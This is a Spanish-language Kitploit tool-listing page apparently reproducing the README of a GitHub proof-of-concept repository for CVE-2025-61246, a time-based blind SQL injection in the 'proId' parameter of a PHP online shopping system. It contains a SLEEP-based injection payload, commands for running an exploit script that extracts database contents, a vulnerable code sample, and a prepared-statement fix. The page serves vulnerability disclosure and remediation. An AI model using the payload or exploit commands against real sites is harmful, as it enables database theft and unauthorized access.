Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-61246 — CVE-2025-61246: Vulnerabilidad de Inyección SQL PoC en Sistema de Compras en Línea PHP | Kitploit
Herramientas/GitHubGitHub/hackergovind/cve-2025-61246
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubhackergovind/cve-2025-61246

CVE-2025-61246

CVE-2025-61246: Vulnerabilidad de Inyección SQL PoC en Sistema de Compras en Línea PHP

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-61246 - Vulnerabilidad de Inyección SQL en Sistema de Compras en Línea

CVE Severidad CVSS

Descripción general

Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-61246, una vulnerabilidad crítica de Inyección SQL descubierta en la aplicación PHP Sistema de Compras en Línea. La vulnerabilidad permite a un atacante no autenticado ejecutar comandos SQL arbitrarios mediante inyección SQL ciega basada en tiempo.

Detalles de la vulnerabilidad

  • ID CVE: CVE-2025-61246
  • Tipo de vulnerabilidad: Inyección SQL (Ciega basada en tiempo)
  • Componente afectado: /online-shopping-system-php-master/review_action.php
  • Versión afectada: 1.0
  • Parámetro vulnerable:
proId
  • Vector de ataque: Red (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • Severidad: Crítica (Puntuación CVSS: 9.8)
  • Descubridor: Govind Pratap Singh
  • Descripción técnica

    La vulnerabilidad existe en el endpoint review_action.php, donde la entrada proporcionada por el usuario en el parámetro proId se incorpora directamente en consultas SQL sin una sanitización adecuada ni consultas parametrizadas. Esto permite a un atacante inyectar cargas útiles SQL maliciosas que pueden:

    • Extraer información sensible de la base de datos
    • Eludir mecanismos de autenticación
    • Modificar o eliminar registros de la base de datos
    • Ejecutar operaciones administrativas

    Patrón de código vulnerable

    root@kitploit:~
    // Código vulnerable (ejemplo)
    $proId = $_POST['proId'];
    $query = "SELECT * FROM products WHERE id = " . $proId;
    mysqli_query($conn, $query);
    

    Vectores de ataque

    Un atacante puede explotar esta vulnerabilidad:

    1. Enviando una solicitud POST manipulada a /online-shopping-system-php-master/review_action.php
    2. Incluyendo una carga útil SQL maliciosa en el parámetro proId
    3. Usando técnicas de inyección SQL ciega basada en tiempo para extraer datos
    4. Aprovechando la vulnerabilidad para obtener acceso no autorizado a la base de datos

    Ejemplo de carga útil

    root@kitploit:~
    proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
    

    Prueba de Concepto

    Este repositorio incluye:

    1. Script de explotación automatizado (exploit.py) - Script en Python para detectar y explotar la vulnerabilidad
    2. Guía de pruebas manuales (MANUAL_TESTING.md) - Instrucciones paso a paso para la explotación manual
    3. Configuración de la aplicación vulnerable (docker-compose.yml) - Entorno Docker para pruebas seguras
    4. Guía de remediación (REMEDIATION.md) - Prácticas de codificación segura y parches

    Instalación y uso

    Prerrequisitos

    root@kitploit:~
    Python 3.7+
    pip install -r requirements.txt
    

    Inicio rápido

    root@kitploit:~
    # Clonar el repositorio
    git clone https://github.com/hackergovind/CVE-2025-61246.git
    cd CVE-2025-61246
    
    # Instalar dependencias
    pip install -r requirements.txt
    
    # Ejecutar el exploit
    python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php
    

    Uso avanzado

    root@kitploit:~
    # Solo detección (sin explotación)
    python exploit.py --url http://target.com/review_action.php --detect-only
    
    # Extraer nombre de la base de datos
    python exploit.py --url http://target.com/review_action.php --extract-db
    
    # Explotación completa con tiempo de espera personalizado
    python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit
    
    # Usar proxy para pruebas
    python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
    

    Impacto

    La explotación exitosa de esta vulnerabilidad puede conllevar:

    • Fuga de datos: Extracción de información sensible de usuarios, credenciales y datos de pago
    • Omisión de autenticación: Acceso no autorizado a funciones administrativas
    • Manipulación de datos: Modificación o eliminación de registros críticos de la base de datos
    • Compromiso total del sistema: Posibilidad de ejecución remota de código en ciertas configuraciones

    Remediación

    Acciones inmediatas

    1. Aplicar validación de entrada: Implementar una validación estricta de entrada para todos los datos proporcionados por el usuario
    2. Usar consultas parametrizadas: Reemplazar SQL dinámico con sentencias preparadas
    3. Implementar reglas WAF: Desplegar reglas de Firewall de Aplicaciones Web para bloquear intentos de inyección SQL
    4. Actualizar la aplicación: Aplicar los últimos parches de seguridad

    Ejemplo de código seguro

    root@kitploit:~
    // Implementación segura usando sentencias preparadas
    $proId = $_POST['proId'];
    $stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
    $stmt->bind_param("i", $proId);
    $stmt->execute();
    $result = $stmt->get_result();
    

    Para pasos detallados de remediación, consulte REMEDIATION.md.

    Referencias

    • Inyección SQL de OWASP
    • CWE-89: Inyección SQL

    Descargo de responsabilidad

    ⚠️ IMPORTANTE: Esta PoC se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso de esta información. Obtenga siempre la autorización adecuada antes de realizar pruebas.

    Autor

    Govind Pratap Singh

    • GitHub: @hackergovind
    • Correo electrónico: [email protected]
    • Medium: https://medium.com/@govindsinghpratap123

    Licencia

    Este proyecto está bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.

    Agradecimientos

    • Equipo de Asignación CVE de MITRE
    • Fundación OWASP
    • Comunidad de Investigación en Seguridad

    Divulgación responsable: Si descubre una vulnerabilidad de seguridad, infórmela de manera responsable al proveedor antes de hacerla pública.

    Descargar herramienta